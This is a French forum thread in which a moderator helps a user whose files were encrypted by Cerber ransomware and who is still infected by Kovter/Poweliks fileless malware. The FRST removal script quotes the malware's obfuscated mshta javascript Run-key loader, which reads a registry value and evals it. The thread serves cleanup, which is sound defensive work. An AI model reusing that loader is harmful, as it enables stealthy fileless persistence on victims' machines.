Infection par cerber

Fermé
adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016 - Modifié par Malekal_morte- le 3/05/2016 à 12:57
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 3 mai 2016 à 14:12
Bonjour,
J'ai un problème. J'ai été infecté par un logiciel de ransomware. Depuis mes fichiers sont cryptés par cerber. Que faire ?

2 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
3 mai 2016 à 12:53
Salut,

Windows a été infecté par un ransomware / rançongiciel chiffreur de fichiers. Ces rançongiciels s'attrapent essentiellement par l'ouverture d'une pièce jointe malicieuse dans un e-mail ou par la visite d'une page internet piégée par des exploits WEB.

A l'heure actuelle, il n'y a pas vraiment de méthode pour récupérer les documents chiffrés. Si les données sont très importantes, les stocker temporairement à l'abri car peut-être qu'il y aura dans le futur une solution pour les récupérer.

Il faut d'abord vérifier qu'aucune menace ne soit encore active.
Par précaution, pense aussi à changer tous tes mots de passe.

1°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

0
adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
3 mai 2016 à 13:07
0
adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
3 mai 2016 à 13:45
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
3 mai 2016 à 13:52
Désinstalle Yahoo! Barre d'outils
Sert à rien.

Cerber n'est plus actif.
Par contre le PC est infecté par Kovter ou PoweLinks
enfin un malware FileLess.


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :


CloseProcesses:
Task: C:\Windows\Tasks\Update Service for Torrent Search.job => C:\Program Files (x86)\Torrent Search\emYdFg1.exe <==== ATTENTION
Task: C:\Windows\Tasks\Update Service for Torrent Search2.job => C:\Program Files (x86)\Torrent Search\emYdFg1.exe <==== ATTENTION
HKU\S-1-5-21-2924915672-1921717122-1332235510-1001\...\Run: [**96acfabd<*>] => mshta javascript:rAa8uUsyO=XqjcN;rf8=new%20ActiveXObject(WScript.Shell);oUSUVd5f=VL;ve09CM=rf8.RegRead(HKCU\\software\\c61f78eae8\\6fffb748);Gd6IFHpeL=j1TtMYK;eval(ve09CM);Ttkyp1fZZ=Hi; <===== ATTENTION (Nom de valeur avec caractères invalides)
HKU\S-1-5-21-2924915672-1921717122-1332235510-1001\...\Run: [**cbdca9ef<*>] => C:\Users\RedacWeb\AppData\Local\eb8c3149\e79fe117.lnk <===== ATTENTION (Nom de valeur avec caractères invalides)
Startup: C:\Users\RedacWeb\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d069154a.lnk [2016-04-29]
reg: reg delete "HKCU\Software\Classes\c61f78eae8"
Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Refais un scan FRST et donne les rapports.
0
adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
3 mai 2016 à 13:56
Ok. c'est en cours de réparation. maintenant mes fichiers sont-ils perdus ?
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
3 mai 2016 à 13:57
oui.
0
adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
3 mai 2016 à 13:58
Ah ça. donc aucune méthode pour récuperer quoi que ce soit ?
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
Modifié par Malekal_morte- le 3/05/2016 à 13:59
non aucune.
0
adonisthefast Messages postés 6 Date d'inscription mardi 3 mai 2016 Statut Membre Dernière intervention 3 mai 2016
3 mai 2016 à 14:07
Merci
0